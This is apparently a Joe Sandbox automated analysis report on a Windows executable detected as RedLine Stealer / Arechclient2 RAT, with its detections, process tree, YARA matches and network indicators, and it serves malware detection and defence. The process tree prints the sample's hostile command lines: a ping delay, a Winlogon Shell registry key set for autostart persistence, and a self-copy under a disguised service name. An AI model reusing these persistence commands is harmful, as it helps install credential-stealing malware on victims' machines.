Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
atpRyiZGTE.exe

Overview

General Information

Sample Name:atpRyiZGTE.exe
Analysis ID:652396
MD5:0515b4d32d6d65d19832858957f0847f
SHA1:3cb9acc775da6908c56890f0827398b817467e0e
SHA256:9027302b65c696c2e079f70c18f55abc1fd10c497b4cad63bdbfbd8ac110b916
Tags:Arechclient2exe
Infos:

Detection

RedLine
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Machine Learning detection for sample
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Uses reg.exe to modify the Windows registry
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • atpRyiZGTE.exe (PID: 3452 cmdline: "C:\Users\user\Desktop\atpRyiZGTE.exe" MD5: 0515B4D32D6D65D19832858957F0847F)
    • cmd.exe (PID: 6720 cmdline: cmd" /c ping 127.0.0.1 -n 38 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe, MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6792 cmdline: ping 127.0.0.1 -n 38 MD5: 70C24A306F768936563ABDADB9CA9108)
      • reg.exe (PID: 3796 cmdline: REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\user\AppData\Roaming\LightKeeperService.exe," MD5: CEE2A7E57DF2A159A065A34913A055C2)
    • cmd.exe (PID: 6248 cmdline: cmd" /c ping 127.0.0.1 -n 45 > nul && copy "C:\Users\user\Desktop\atpRyiZGTE.exe" "C:\Users\user\AppData\Roaming\LightKeeperService.exe" && ping 127.0.0.1 -n 45 > nul && "C:\Users\user\AppData\Roaming\LightKeeperService.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6200 cmdline: ping 127.0.0.1 -n 45 MD5: 70C24A306F768936563ABDADB9CA9108)
      • PING.EXE (PID: 6864 cmdline: ping 127.0.0.1 -n 45 MD5: 70C24A306F768936563ABDADB9CA9108)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.450115307.0000000004BE2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    00000000.00000002.450115307.0000000004BE2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.448862255.00000000048DB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000000.00000002.448862255.00000000048DB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: atpRyiZGTE.exe PID: 3452JoeSecurity_RedLineYara detected RedLine StealerJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.atpRyiZGTE.exe.49762aa.1.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
            • 0x451b1:$s1: +773yll
            • 0x45342:$s1: \xED\xF1\xF1\xF5\xBF\xAA\xAA
            • 0x475df:$s1: \xE5\xF9\xF9\xFD\xB7\xA2\xA2
            • 0x47783:$s1: PLLH\x02\x17\x17
            • 0x48628:$s1: \x13\x0F\x0F\x0BATT
            • 0x82d05:$s1: \xCA\xD6\xD6\xD2\x98\x8D\x8D
            • 0x451be:$s2: +7730yll
            • 0x4534f:$s2: \xED\xF1\xF1\xF5\xF6\xBF\xAA\xAA
            • 0x475ec:$s2: \xE5\xF9\xF9\xFD\xFE\xB7\xA2\xA2
            • 0x47790:$s2: PLLHK\x02\x17\x17
            • 0x4c19a:$s2: \xF5\xE9\xE9\xED\xEE\xA7\xB2\xB2
            • 0x4c5f7:$s2: \x08\x14\x14\x10\x13ZOO
            • 0x73a84:$s2: osswt=((
            • 0x73b9b:$s2: \xCB\xD7\xD7\xD3\xD0\x99\x8C\x8C
            • 0x83582:$s2: \x0E\x12\x12\x16\x15\II
            0.2.atpRyiZGTE.exe.49762aa.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              0.2.atpRyiZGTE.exe.49762aa.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.atpRyiZGTE.exe.49762aa.1.unpackMALWARE_Win_Arechclient2Detects Arechclient2 RATditekSHen
                • 0x92f6d:$s14: keybd_event
                • 0x97c10:$v1_1: grabber@
                • 0x90796:$v1_2: <BrowserProfile>k__
                • 0x9185a:$v1_3: <SystemHardwares>k__
                • 0x91919:$v1_5: <ScannedWallets>k__
                • 0x919a9:$v1_6: <DicrFiles>k__
                • 0x91985:$v1_7: <MessageClientFiles>k__
                • 0x91d4f:$v1_8: <ScanBrowsers>k__BackingField
                • 0x91da1:$v1_8: <ScanWallets>k__BackingField
                • 0x91dbe:$v1_8: <ScanScreen>k__BackingField
                • 0x91df8:$v1_8: <ScanVPN>k__BackingField
                • 0x84e76:$v1_9: displayName[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}Local Extension Settingshost
                • 0x84682:$v1_10: \sitemanager.xml MB or SELECT * FROM Cookiesconfig
                0.2.atpRyiZGTE.exe.4c7d2e8.5.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
                • 0x451b1:$s1: +773yll
                • 0x45342:$s1: \xED\xF1\xF1\xF5\xBF\xAA\xAA
                • 0x475df:$s1: \xE5\xF9\xF9\xFD\xB7\xA2\xA2
                • 0x47783:$s1: PLLH\x02\x17\x17
                • 0x48628:$s1: \x13\x0F\x0F\x0BATT
                • 0x82d05:$s1: \xCA\xD6\xD6\xD2\x98\x8D\x8D
                • 0x451be:$s2: +7730yll
                • 0x4534f:$s2: \xED\xF1\xF1\xF5\xF6\xBF\xAA\xAA
                • 0x475ec:$s2: \xE5\xF9\xF9\xFD\xFE\xB7\xA2\xA2
                • 0x47790:$s2: PLLHK\x02\x17\x17
                • 0x4c19a:$s2: \xF5\xE9\xE9\xED\xEE\xA7\xB2\xB2
                • 0x4c5f7:$s2: \x08\x14\x14\x10\x13ZOO
                • 0x73a84:$s2: osswt=((
                • 0x73b9b:$s2: \xCB\xD7\xD7\xD3\xD0\x99\x8C\x8C
                • 0x83582:$s2: \x0E\x12\x12\x16\x15\II
                Click to see the 35 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                No Snort rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: atpRyiZGTE.exeReversingLabs: Detection: 42%
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\LightKeeperService.exeReversingLabs: Detection: 42%
                Machine Learning detection for sample
                Source: atpRyiZGTE.exeJoe Sandbox ML: detected
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\LightKeeperService.exeJoe Sandbox ML: detected
                Source: atpRyiZGTE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 142.250.185.100:443 -> 192.168.2.4:49746 version: TLS 1.0
                Source: atpRyiZGTE.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

                barindex
                Uses ping.exe to check the status of other devices and networks
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 38
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 142.250.185.100:443 -> 192.168.2.4:49746 version: TLS 1.0
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: atpRyiZGTE.exeString found in binary or memory: http://api.textlocal.in/send/?
                Source: atpRyiZGTE.exe, LightKeeperService.exe.19.drString found in binary or memory: http://api.textlocal.in/send/?1sangleshubham9
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: atpRyiZGTE.exe, 00000000.00000003.348966637.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.337172932.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.334588359.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.335558240.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.440305727.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.341919239.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.348472153.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.341573864.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.345775535.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.340929865.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.438770547.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.343342627.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.342714698.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.344471615.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.353915669.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.351717491.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.347097585.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.336546347.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.354548458.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.352972101.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.335252277.0000000006887000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.adp/1.0/
                Source: atpRyiZGTE.exe, 00000000.00000003.348966637.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.337172932.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.334588359.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.335558240.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.440305727.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.341919239.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.348472153.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.341573864.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.345775535.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.340929865.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.438770547.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.343342627.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.342714698.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.344471615.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.353915669.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.351717491.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.347097585.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.336546347.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.354548458.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.352972101.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.335252277.0000000006887000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ns.microsoto/1.2
                Source: atpRyiZGTE.exe, 00000000.00000002.445054854.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295467627.0000000006850000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295597676.0000000006845000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295438765.0000000006845000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: atpRyiZGTE.exe, 00000000.00000003.295735340.0000000006846000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295655832.0000000006846000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295687027.0000000006846000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/i
                Source: atpRyiZGTE.exe, 00000000.00000003.299802336.0000000006859000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.299334032.0000000006859000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.298764281.0000000006846000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300440687.0000000006859000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                Source: atpRyiZGTE.exe, 00000000.00000003.298764281.0000000006846000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlG
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: atpRyiZGTE.exe, 00000000.00000003.314251572.0000000006846000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.312675141.0000000006814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: atpRyiZGTE.exe, 00000000.00000003.312783150.0000000006855000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.312649918.0000000006855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html8
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: atpRyiZGTE.exe, 00000000.00000002.452188664.0000000006800000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coma
                Source: atpRyiZGTE.exe, 00000000.00000002.452188664.0000000006800000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.como
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: atpRyiZGTE.exe, 00000000.00000003.299475642.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300737819.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300455988.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300935758.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300039387.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.301161307.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300667068.0000000006814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comr
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: atpRyiZGTE.exe, 00000000.00000003.309958195.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.309784943.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.315674707.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.310013124.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.315753789.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.310158459.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.309902011.0000000006814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.de
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: atpRyiZGTE.exe, 00000000.00000003.315674707.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.315753789.0000000006814000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deEv
                Source: atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: atpRyiZGTE.exe, atpRyiZGTE.exe, 00000000.00000002.445054854.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: atpRyiZGTE.exe, LightKeeperService.exe.19.drString found in binary or memory: https://www.google.com%BorderColorFocused
                Source: atpRyiZGTE.exe, 00000000.00000002.445054854.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: atpRyiZGTE.exe, 00000000.00000002.445054854.0000000002EA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comT
                Source: unknownDNS traffic detected: queries for: www.google.com
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.atpRyiZGTE.exe.49762aa.1.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                Source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                Source: 0.2.atpRyiZGTE.exe.4aac2da.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                Source: 0.2.atpRyiZGTE.exe.4a112ca.2.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                Source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                Source: 0.2.atpRyiZGTE.exe.4aac2da.3.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                Source: 0.2.atpRyiZGTE.exe.4be22da.4.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                Source: 0.2.atpRyiZGTE.exe.4a112ca.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                Source: 0.2.atpRyiZGTE.exe.4be22da.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                Source: 0.2.atpRyiZGTE.exe.49762aa.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Arechclient2 RAT Author: ditekSHen
                Source: atpRyiZGTE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.atpRyiZGTE.exe.49762aa.1.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.atpRyiZGTE.exe.49762aa.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                Source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                Source: 0.2.atpRyiZGTE.exe.4aac2da.3.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.atpRyiZGTE.exe.4aac2da.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                Source: 0.2.atpRyiZGTE.exe.4a112ca.2.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.atpRyiZGTE.exe.4a112ca.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                Source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                Source: 0.2.atpRyiZGTE.exe.4aac2da.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.atpRyiZGTE.exe.4aac2da.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                Source: 0.2.atpRyiZGTE.exe.4be22da.4.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.atpRyiZGTE.exe.4be22da.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                Source: 0.2.atpRyiZGTE.exe.4a112ca.2.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.atpRyiZGTE.exe.4a112ca.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                Source: 0.2.atpRyiZGTE.exe.4be22da.4.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                Source: 0.2.atpRyiZGTE.exe.4be22da.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                Source: 0.2.atpRyiZGTE.exe.49762aa.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
